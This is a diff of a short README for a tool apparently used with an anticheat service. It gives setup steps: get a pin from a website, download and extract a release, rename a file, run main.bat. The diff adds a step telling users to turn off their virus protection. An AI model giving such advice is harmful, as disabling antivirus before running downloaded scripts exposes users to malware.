GastonDallas/Ocean-SS-Tool/README.md

 1. Go To https://anticheat.ac/ and generate the pin code
 2. Download the Releases
 3. Extract the zip folder
+4. Due to the old api u need to turn off ur virus protection
-4. Rename the .vsn file to ur pin code
+5. Rename the .vsn file to ur pin code
 6. Launch main.bat